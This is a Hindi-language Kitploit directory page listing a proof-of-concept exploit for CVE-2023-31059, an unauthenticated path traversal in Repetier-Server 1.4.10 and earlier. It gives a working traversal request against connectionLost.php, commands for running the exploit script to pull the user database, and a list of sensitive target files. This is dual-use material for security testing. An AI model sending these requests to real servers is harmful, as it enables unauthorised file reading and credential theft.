Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2023-31059-Repetier-Server-1.4.10-Unauthenticated-Path-Traversal — CVE-2023-31059 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Repetier-Server ≤1.4.10 में एक अनप्रमाणित पाथ ट्रैवर्सल है, जो क्राफ्टेड HTTP अनुरोधों के माध्यम से मनमानी फ़ाइल पढ़ने में सक्षम बनाता है। | Kitploit
उपकरण/GitHubGitHub/mbanyamer/cve-2023-31059-repetier-server-1.4.10-unauthenticated-path-traversal
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubmbanyamer/cve-2023-31059-repetier-server-1.4.10-unauthenticated-path-traversal

CVE-2023-31059-Repetier-Server-1.4.10-Unauthenticated-Path-Traversal

CVE-2023-31059 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो Repetier-Server ≤1.4.10 में एक अनप्रमाणित पाथ ट्रैवर्सल है, जो क्राफ्टेड HTTP अनुरोधों के माध्यम से मनमानी फ़ाइल पढ़ने में सक्षम बनाता है।

रिपॉजिटरी देखें
16 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Repetier-Server <= 1.4.10

लेखक: मोहम्मद इदरीस बनयामेर
भूमिका: सुरक्षा शोधकर्ता
देश: जॉर्डन 🇯🇴


अवलोकन

Repetier‑Server ≤ 1.4.10 में बिना प्रमाणीकरण वाली रिमोट पाथ ट्रैवर्सल / LFI भेद्यता के लिए प्रूफ‑ऑफ‑कॉन्सेप्ट शोषण।

यह भेद्यता connectionLost.php एंडपॉइंट में विशेष रूप से तैयार किए गए ..%5c अनुक्रमों के माध्यम से मनमानी फ़ाइल पढ़ने की अनुमति देती है।


भेद्यता विवरण

फ़ील्डमान
उत्पादRepetier‑Server
प्रभावित≤ 1.4.10
CVECVE‑2023‑31059
प्रकारपाथ ट्रैवर्सल / LFI
प्रमाणीकरणकोई नहीं
वेक्टरनेटवर्क
प्रभावमनमानी फ़ाइल पढ़ना
CVSS9.8 गंभीर

PoC हमला प्रवाह

root@kitploit:~
flowchart LR
    A[Attacker] -->|HTTP request with ..%5c traversal| B[Repetier Server]
    B --> C[base/connectionLost.php]
    C -->|Unsanitized file parameter| D[Windows Filesystem]
    D --> E[Sensitive File]
    E --> B
    B -->|File contents in HTTP response| A

शोषण उदाहरण

root@kitploit:~
GET /base/connectionLost.php?file=..%5c..%5cWindows%5cwin.ini HTTP/1.1
Host: target:3344

उपयोग

root@kitploit:~
# Test vulnerability
python3 CVE-2023-31059.py http://<target-ip>:3344/ --test

# Extract user database
python3 CVE-2023-31059.py http://<target-ip>:3344/ \
  --file "ProgramData\\Repetier-Server\\database\\user.sql" \
  --depth 20

आवश्यकताएँ

root@kitploit:~
pip install requests

उच्च-मूल्य लक्ष्य

root@kitploit:~
ProgramData\Repetier-Server\database\user.sql
ProgramData\Repetier-Server\config.xml
Windows\win.ini
Windows\System32\drivers\etc\hosts

अस्वीकरण

यह PoC केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। इसका उपयोग केवल उन सिस्टमों पर करें जिनके स्वामी आप हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति है।


संपर्क

GitHub: https://github.com/mbanyamer

टूल डाउनलोड करें